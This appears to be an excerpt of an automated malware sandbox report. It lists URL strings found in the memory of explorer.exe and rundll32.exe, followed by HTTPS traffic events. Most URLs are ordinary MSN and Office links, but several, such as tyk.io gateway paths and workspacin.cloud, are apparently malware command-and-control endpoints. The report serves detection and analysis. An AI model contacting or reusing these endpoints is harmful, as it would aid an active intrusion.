Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
Source: explorer.exe, 00000016.00000002.2945734291.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1859052974.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000016.00000002.2945125604.000000000B4AE000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://illoskanawer.com/live/
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
Source: explorer.exe, 00000016.00000000.1846357884.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
Source: explorer.exe, 00000016.00000002.2945734291.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1859052974.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com_
Source: explorer.exe, 00000016.00000002.2945734291.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1859052974.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: rundll32.exe, 00000012.00000003.1868997096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882651450.00000292115BC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/
Source: rundll32.exe, 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/api/azure
Source: rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.php
Source: rundll32.exe, 00000012.00000003.2284190577.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311847302.000002921159F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.php4
Source: rundll32.exe, 00000012.00000003.2284190577.00000292115AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.phpA
Source: rundll32.exe, 00000012.00000003.2810418995.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921159F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.phpL
Source: rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.phpLgF
Source: rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.phpMfE
Source: rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/n
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
Source: rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/
Source: rundll32.exe, 00000012.00000003.2810418995.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.00000292115EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/5/
Source: rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/F
Source: rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure
Source: rundll32.exe, 00000012.00000002.2938154508.00000292115EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure(
Source: rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure.php
Source: rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure/j
Source: rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797600040.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure4
Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810618243.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797600040.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure=
Source: rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azureY
Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810618243.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797600040.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurej
Source: rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurent.php
Source: rundll32.exe, 00000012.00000003.2810618243.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797600040.000002921163E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurep&j
Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797600040.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurep1j
Source: rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurep://www.
Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurepP
Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurepjB
Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.00000292115EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810618243.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797600040.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.php
Source: rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.php&j
Source: rundll32.exe, 00000012.00000003.2311970800.00000292115EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.php(
Source: rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.php1j
Source: rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.php4
Source: rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797600040.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.phpP
Source: rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/f
Source: rundll32.exe, 00000012.00000003.2680109233.00000292115EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284190577.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.00000292115EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000016.00000000.1859052974.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2945734291.000000000C557000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/L
Source: explorer.exe, 00000016.00000002.2945734291.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1859052974.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: explorer.exe, 00000016.00000002.2945734291.000000000C54A000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://workspacin.cloud/
Source: explorer.exe, 00000016.00000002.2947027390.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://workspacin.cloud/live/
Source: explorer.exe, 00000016.00000002.2943554599.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://workspacin.cloud/live/0vaH
Source: explorer.exe, 00000016.00000002.2947027390.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://workspacin.cloud/live/6
Source: explorer.exe, 00000016.00000002.2947027390.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://workspacin.cloud/live/J5
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
Source: explorer.exe, 00000016.00000002.2940539964.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe

Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
